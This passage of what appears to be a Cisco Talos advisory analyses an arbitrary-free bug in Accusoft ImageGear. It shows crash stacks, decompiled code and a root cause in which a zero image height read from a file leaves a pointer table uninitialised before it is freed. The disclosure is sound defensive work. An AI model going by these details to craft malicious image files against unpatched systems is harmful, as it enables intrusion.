    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    

Inspecting the argument indicates the parameter to free() is not a valid address: 0xd0d0d0c0.  
Tracing back through the call stack leads us to the function IGDIBRunEnds::delete_table_mys_rbg_ptr with the following pseudo code:

    LINE1  void __thiscall IGDIBRunEnds::delete_table_mys_rbg_ptr(IGDIBRunEnds *this,int pixpos,int some_buffer)
    LINE2  {
    LINE3    if (this->mys_RGB != (mys_RGB *)this->table_mys_rgb[pixpos]) {
    LINE4       operator_delete((mys_RGB *)this->table_mys_rgb[pixpos]);
    LINE5    }
    LINE6    if (some_buffer == 0) {
    LINE7       some_buffer = (int)this->mys_RGB;
    LINE8    }
    LINE9    this->table_mys_rgb[pixpos] = some_buffer;
    LINE10   this->field_0x48 = 1;
    LINE11   return;
    LINE12 }
    

The free is corresponding to the operator_delete called in LINE4, which is indexed by pixpos to delete a specific element.

When looking at how this is constructed, the table_mys_rgb object in this case lands in the following code:

    LINE13 void __thiscall IGDIBRunEnds::FUN_743f6aa0(IGDIBRunEnds *this)
    LINE14 {  
    LINE15   if (this->table_mys_rgb == (dword *)0x0) {
    LINE16     size_to_allocate = this->size_Y * 4;
    LINE17     buffer = (dword *)operator_new(-(uint)((int)(size_to_allocate >> 0x20) != 0) |
    LINE18                                    (uint)size_to_allocate);
    LINE19     if (this->table_mys_rgb != buffer) {
    LINE20       operator_delete(this->table_mys_rgb);
    LINE21       this->table_mys_rgb = buffer;
    LINE22     }
    LINE23     size_y = this->size_Y;
    LINE24     while (size_y != 0) {
    LINE25       size_y = size_y - 1;
    LINE26       this->table_mys_rgb[size_y] = (dword)this->mys_RGB;
    LINE27     }
    LINE28   }
    LINE29   return;
    LINE30 }
    

So we can see the allocation in LINE17, followed by a while loop between LINE24 and LINE27 to fill the memory allocated. Now the issue is happening when size_Y read from the file is null, thus the allocation of buffer becomes uncontrolled and a zero byte allocation is made in LINE17, returned by a malloc null operation. Thus the while loop (LINE24) is not processed and the flow continues without initializing any element in table_mys_rgb. When the thread reaches the function IGDIBRunEnds::delete_table_mys_rbg_ptr, even with a null pixpos value, the pointer at table_mys_rgb[0] (which is not initialized, since table_mys_rgb has a size of 0) is freed via operator_delete, possibly leading to an arbitrary free.

**Crash Information**

    0:000:x86> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    
    KEY_VALUES_STRING: 1
    
        Key  : AV.Fault
        Value: Read
    
        Key  : Analysis.CPU.mSec
        Value: 1905
    
        Key  : Analysis.DebugAnalysisManager
        Value: Create
    
        Key  : Analysis.Elapsed.mSec
        Value: 34355
    
        Key  : Analysis.Init.CPU.mSec
        Value: 5030
    
        Key  : Analysis.Init.Elapsed.mSec
        Value: 119236
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 123
    
        Key  : Timeline.OS.Boot.DeltaSec
        Value: 1162
    
        Key  : Timeline.Process.Start.DeltaSec
        Value: 84
    
        Key  : WER.OS.Branch
        Value: vb_release
    
        Key  : WER.OS.Timestamp
        Value: 2019-12-06T14:06:00Z
    
        Key  : WER.OS.Version
        Value: 10.0.19041.1
    
        Key  : WER.Process.Version
        Value: 1.0.1.1
    
    
    NTGLOBALFLAG:  2000000
    
    PROCESS_BAM_CURRENT_THROTTLED: 0
    
    PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APPLICATION_VERIFIER_LOADED: 1
    
    EXCEPTION_RECORD:  (.exr -1)
    ExceptionAddress: 71928758 (verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0x000000b8)
       ExceptionCode: c0000005 (Access violation)
      ExceptionFlags: 00000000
    NumberParameters: 2
       Parameter[0]: 00000000
       Parameter[1]: d0d0d0a0
    Attempt to read from address d0d0d0a0
    
    FAULTING_THREAD:  0000175c
    
    PROCESS_NAME:  Fuzzme.exe
    
    READ_ADDRESS:  d0d0d0a0 
    
    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE_STR:  c0000005
    
    EXCEPTION_PARAMETER1:  00000000
    
    EXCEPTION_PARAMETER2:  d0d0d0a0
    
    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    
    
    STACK_COMMAND:  ~0s ; .cxr ; kb
    
    SYMBOL_NAME:  verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+b8
    
    MODULE_NAME: verifier_71920000
    
    IMAGE_NAME:  verifier.dll
    
    FAILURE_BUCKET_ID:  INVALID_POINTER_READ_AVRF_c0000005_verifier.dll!AVrfpDphFindBusyMemoryNoCheck
    
    OS_VERSION:  10.0.19041.1
    
    BUILDLAB_STR:  vb_release
    
    OSPLATFORM_TYPE:  x64
    
    OSNAME:  Windows 10
    
    IMAGE_VERSION:  10.0.19041.1
    
    FAILURE_ID_HASH:  {bd57151c-e59f-3c94-75ca-6923d50e6d0d}
    
    Followup:     MachineOwner
    ---------
    

**Vendor Response**

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

Download Links Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-01-26 - Vendor disclosure  
2022-04-29 - Vendor Patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

Tag

#pdf